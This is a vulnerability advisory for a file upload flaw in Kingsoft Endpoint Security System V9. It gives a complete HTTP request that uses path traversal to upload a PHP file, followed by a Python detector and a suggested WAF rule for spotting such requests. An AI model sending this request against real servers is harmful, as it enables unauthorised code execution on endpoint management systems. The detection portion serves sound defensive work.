
Kingsoft Endpoint Security System V9 software_relation.php Arbitrary File Upload Vulnerability

POC

Note that the toolFileName parameter must point to a file that already exists; there are many files under the root directory to choose from.

POST /inter/software_relation.php HTTP/1.1
Host: 192.168.86.128:6868
User-Agent: insomnia/2021.3.0
Cookie: SKYLARa0aede9e785feabae789c6e03d=0dii85n3v7bh0ct4se9jckmee0
Content-Type: multipart/form-data; boundary=X-INSOMNIA-BOUNDARY
Accept: */*
Content-Length: 594
Connection: close

--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolFileName"

../../phpinfo.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolName"

123.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="version"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolDescri"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="fileSize"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolImage"; filename="info.php"
Content-Type: application/x-httpd-php

<?php
phpinfo();?>
--X-INSOMNIA-BOUNDARY--
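
For detection, the request above can be matched on its own form fields. The following Python check is an added example, not part of the original page or the vendor's code: it parses a captured multipart body sent to /inter/software_relation.php and flags a traversal sequence in toolFileName or a script extension in toolName or the uploaded filename. The extension list, function names and sample bodies are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes

TARGET_PATH = "/inter/software_relation.php"   # endpoint from the request above
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)  # assumed extension list

def inspect_upload(method, path, content_type, body):
    """Return reasons a captured request matches the upload pattern shown above."""
    if method.upper() != "POST" or path.split("?")[0] != TARGET_PATH:
        return []
    # Reuse the MIME parser: prepend the HTTP Content-Type so it sees the boundary.
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    if not msg.is_multipart():
        return []
    findings = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        text = (part.get_payload(decode=True) or b"").decode("utf-8", "replace").strip()
        if name == "toolFileName" and (".." in text or text[:1] in ("/", "\\")):
            findings.append("toolFileName contains a path traversal sequence: " + text)
        if name == "toolName" and SCRIPT_EXT.search(text):
            findings.append("toolName has a script extension: " + text)
        if filename and SCRIPT_EXT.search(filename):
            findings.append("uploaded file has a script extension: " + filename)
    return findings

def build_body(boundary, fields, file_field, filename, content):
    """Construct a multipart body for the samples below (test data only)."""
    out = []
    for key, value in fields.items():
        out.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{key}"\r\n\r\n{value}\r\n')
    out.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
               f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n{content}\r\n')
    out.append(f"--{boundary}--\r\n")
    return "".join(out).encode()

CTYPE = "multipart/form-data; boundary=SAMPLE"   # constructed samples, not real traffic
SUSPECT = build_body("SAMPLE", {"toolFileName": "../../phpinfo.php", "toolName": "123.php"},
                     "toolImage", "info.php", "<?php phpinfo();?>")
BENIGN = build_body("SAMPLE", {"toolFileName": "setup.exe", "toolName": "setup"},
                    "toolImage", "icon.png", "PNG")

if __name__ == "__main__":
    for label, body in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, inspect_upload("POST", TARGET_PATH, CTYPE, body))
```

The same three conditions translate directly into a WAF or reverse-proxy rule scoped to this path.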